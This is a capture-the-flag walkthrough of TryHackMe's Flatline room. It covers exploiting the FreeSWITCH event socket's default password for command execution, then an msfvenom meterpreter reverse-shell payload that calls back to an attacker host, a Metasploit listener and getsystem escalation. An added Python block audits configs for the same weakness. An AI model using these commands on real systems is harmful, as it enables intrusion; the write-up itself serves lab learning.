Flatline THM Walkthrough

Mahendra Kumar
4 min read, Feb 27, 2022

Hello everyone! I am back with another walkthrough, this time of a challenge named “Flatline” recently released on TryHackMe. It is an easy machine based on compromising a Windows system, but there is nothing to worry about; you just need the basics to root it. Here is the link to the Flatline room: https://tryhackme.com/room/flatline. One more thing you should know: since the machine is Windows, it will sometimes take a few minutes to respond and will sometimes fail to respond at all, so don’t get frustrated and try again. I’ll be hiding the flags so that you try it yourself and learn something new. So, let’s start!

My TryHackMe profile: https://tryhackme.com/p/technoreck

Reconnaissance

We start by scanning the machine to find which ports are open and what services they are running.

nmap -sC -sV -vv -Pn <Target Machine>

Here, on port 8021, we found something interesting: a service named FreeSWITCH. Let’s see if there is an exploit for it on ExploitDB.

We found one command execution exploit, so let’s download it.

Let’s try to understand what the exploit is actually doing. From the above code we can infer that FreeSWITCH is a kind of gateway with a default password, “ClueCon”, which allows you to execute arbitrary commands on the host. Let’s test it!
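The weakness described above (the event socket on port 8021 accepting the default password “ClueCon”) can be checked from the defender’s side. This is an added example, not part of the original walkthrough: a Python audit of FreeSWITCH’s event_socket.conf.xml. The sample configs are constructed and the finding names are hypothetical labels.

```python
import ipaddress
import xml.etree.ElementTree as ET

DEFAULT_PASSWORD = "ClueCon"  # default password named in the walkthrough

# Constructed sample configs (not taken from the room's machine).
STOCK_CONF = """<configuration name="event_socket.conf">
  <settings>
    <param name="listen-ip" value="0.0.0.0"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="ClueCon"/>
    <!-- <param name="apply-inbound-acl" value="loopback.auto"/> -->
  </settings>
</configuration>"""

HARDENED_CONF = """<configuration name="event_socket.conf">
  <settings>
    <param name="listen-ip" value="127.0.0.1"/>
    <param name="password" value="constructed-long-random-secret"/>
    <param name="apply-inbound-acl" value="loopback.auto"/>
  </settings>
</configuration>"""


def audit_event_socket(xml_text):
    """Return a list of findings (hypothetical labels) for one config document."""
    root = ET.fromstring(xml_text)  # the parser drops commented-out params
    params = {p.get("name"): p.get("value", "") for p in root.iter("param")}
    findings = []
    # A missing password is treated like the default
    # (assumption: the module falls back to its built-in value).
    if params.get("password", DEFAULT_PASSWORD) == DEFAULT_PASSWORD:
        findings.append("default-password")
    # Anything other than a loopback address exposes the socket to the network.
    listen_ip = params.get("listen-ip", "")
    try:
        if not ipaddress.ip_address(listen_ip).is_loopback:
            findings.append("non-loopback-listener")
    except ValueError:  # empty value, variable or hostname: cannot prove it is local
        findings.append("non-loopback-listener")
    # Without an inbound ACL the password is the only barrier.
    if "apply-inbound-acl" not in params:
        findings.append("no-inbound-acl")
    return findings


if __name__ == "__main__":
    for name, conf in (("stock", STOCK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_event_socket(conf) or "ok")
```
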

Remote Command Execution

Noicee! The command worked and we got the name of the user, nekrotic.

Let’s now read the user flag directly using the type command on the user.txt file on the desktop of the user nekrotic.

User Flag

I tried the same with root.txt, but it threw an error: -ERR no reply.

To go further and get the root flag, we need a reverse shell. We will use msfvenom to make a Windows reverse shell payload. Here is the command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > rootkit.exe

Reverse Shell and Root Flag

Now, by starting an HTTP server on our local machine, we will upload this rootkit.exe to the host using command execution, and also start our listener using Metasploit to receive the connection from the host after the exploit is executed. This process may take some minutes, as the machine is slow.

Boom! Here we are in the host’s system.

Now, if you run the command “net user”, you’ll see that the user nekrotic has administrator privileges, yet we are still not able to read the root.txt file. Why?

Most probably the permissions on root.txt have been changed so that only SYSTEM can access it, which means it can only be read when you are running as the SYSTEM account. Let me explain this better with an image:

As the image shows, even though I am the administrator, if I remove the read permission for my account on this particular text file, then SYSTEM is the only one that can access it. But since I am an admin, I can elevate to SYSTEM and access everything as SYSTEM. We can do this with this command:

getsystem

Now let’s try to read the root.txt file.

Voillaa!!! We got the root flag and completed the challenge.

So this was all from my side. I hope you learnt something new from this, and that it helped if you were stuck at any point in the challenge. I’ll see you in the next one; till then, learn hacking to hack for good!
